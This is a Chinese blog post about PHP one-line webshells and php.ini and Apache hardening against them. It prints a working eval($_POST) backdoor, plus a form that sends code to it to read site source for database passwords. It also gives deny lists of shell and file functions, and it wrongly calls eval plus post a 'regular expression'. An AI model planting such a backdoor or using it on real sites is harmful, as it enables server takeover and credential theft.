PHP木马—杂记1

最新推荐文章于 2023-08-20 21:45:04 发布
最新推荐文章于 2023-08-20 21:45:04 发布
阅读量288 收藏
点赞数
分类专栏: php安全防范 文章标签: 安全 php
原文链接:https://blog.csdn.net/senlin1202/article/details/50800071
版权

文章目录

一句话木马

<?php eval($_post[cmd]);?>

补充:eval和post构成一个正则表达式,执行post的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当成php语句执行,利用这个功能可以查看甚至修改数据库数据和文件。
使用的方法可以随便编写一个html来完成,例如:

<form method=post action=http://....../你的名字.php>
<textarea name=cmd>
//这里面写PHP程序,随便连接数据和修改文件都可以,也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码
$str=file_get_content('xxx.php');
$str=str_replace('<','&lt;',$str);
echo "<pre>$str</pre>"
</textarea>
<input type=submit>
</form>

PHP木马的防范方法

PHP是能让你生成动态网页的工具之一。
PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表,超文本预处理器(PHP: Hypertext Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。
PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。
不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。

一、防止php木马执行webshell

打开safe_mode, 在,php.ini中设置 disable_functions= passthru,exec,shell_exec,system 二者选一即可,也可都选。

二、防止跳出web目录

首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。

三、防止php木马读写文件目录

在php.ini中的 disable_functions= passthru,exec,shell_exec,system 后面加上php处理文件的函数,主要有 fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成为 disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile 。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。 如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft /add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。
注:可以了解一下mcafee安全设置,防止一些网页木马生成文件等。

hello@kitty
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP一句话木马深度详细剖析
Cwillchris的博客
06-01 1219
PHP一句话木马原理分析
PHP木马
qq_41272376的博客
02-16 4198
PHP木马 一句话木马 可以在目标服务器上执行PHP代码,并和客户端(如菜刀,Cknife、冰蝎、蚁剑)进行交互的webshell,俗称小马。 多功能木马 根据PHP语法,编写较多代码,并在服务器上执行,完成所有功能的Webshell,俗称大马 逻辑木马 利用系统逻辑漏洞(如php uaf漏洞),绕过访问控制或执行特殊功能的WebShell PHP 可执行系统命令的函数 system string system ( string $command [, int &$return_var ] );
PHP木马入门指南:绕过WAF轻松入侵
鹅子鱼的博客:很菜但是很好学的小菜鸟
03-24 1020
一句话木马之后,演变一下,绕狗且不是轻轻松松
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3184
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上传。
全世界最小的php网页木马一枚 附PHP木马的防范方法
问君能有几多愁,恰似一江春水向东流
05-14 1686
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。 php网页木马 <?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as
防御php木马.zip
01-05
防御php木马.zip 限制apache操作权限 限制执行shell 限制读写文件
PHP 木马攻击防御技巧
10-29
实际上我们还可以通过设置各个文件夹的权限,来让apache用户只能执行我们想让它能干的事情,给每一个目录建立一个单独能读写的用户。
PHP实现webshell扫描文件木马的方法
10-19
主要介绍了PHP实现webshell扫描文件木马的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
PHP 木马攻击的防御设置方法
09-30
本文通过介绍一些技巧介绍了针对PHP木马攻击的防御之道,通过这些方面您能够更好的防范木马程式。
php木马攻击防御之道
10-30
本文通过介绍一些技巧介绍了针对PHP木马攻击的防御之道,通过这些方面您能够更好的防范木马程式。
PHP木马查杀文件,木马查杀插件
weixin_30920853的博客
07-26 206
PHP木马查杀文件,木马查杀插件 将以下文件上传到网站的根目录,然后访问这个文件即可; <?php define("WEBSCAN_KEY", "4996c09effad40fcbdcdaaf1f589895a"); date_default_timezone_set('GMT'); ini_set('displa...
php+web+木马扫描器,PHPWeb木马扫描器代码分享_PHP
weixin_39541767的博客
03-12 144
PHPWeb木马扫描器代码分享_PHP不废话了,直接贴代码了。代码如下:输出查看密码,密码校验正确以后输出文件内容if(empty($_POST['passchack'])){echo""."";exit;}elseif(isset($_POST['passchack'])&&$_POST['passchack']==$pass){$code=file_get_contents($...
一句话图片的制作方法
看着博客敲代码
06-29 410
将写有一句话的k.php文件和一个普通的图片time.gng放在同一目录下,可以通过Linux的cat、echo命令或Windows的copy命令进行制作。
php 木马 加密,PHP木马大全 一句话的PHP木马的防范
weixin_34208400的博客
03-09 1312
PHP木马大全一句话的PHP木马的防范(2015-01-28 22:12:07)标签:it分类:phpphp后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen,proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode,gzinflat...
萌新之php一句话木马(上传漏洞)
weixin_45805993的博客
11-09 1万+
0x00参考文章 https://www.cnblogs.com/wangtanzhi/p/12243206.html https://xz.aliyun.com/t/2435 https://blog.csdn.net/momo_sleet/article/details/82497520 0x01 什么是一句话木马 <?php @eval($_POST['hacker']); ?> 如上就是一句一句话木马,eval函数可以使php将post进去的内容当做代码处理 如果网站在用户上传文件时没
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
热门推荐
百彦子烨的博客
11-10 1万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
渗透测试教学之MSF生成木马
最新发布
weixin_45109326的博客
08-20 1944
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
php一句话怎么写_PHP一句话木马后门
weixin_39948309的博客
03-08 1104
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。一句话木马的原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去隐蔽特征,而白帽则不断的更新过滤方法,建起更高的城墙。一、原理简述对于不同的语言有不同的构造方法。基本构造:最...
webshell之一句话木马变形
weixin_30371875的博客
05-05 1441
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COO...
PHP木马怎么入侵网站
03-13
我可以回答这个问题。...黑客可以通过PHP木马获取网站的敏感信息,或者控制网站进行恶意操作。为了防止PHP木马入侵,网站管理员需要及时更新网站的软件和插件,同时加强密码安全和访问控制等措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值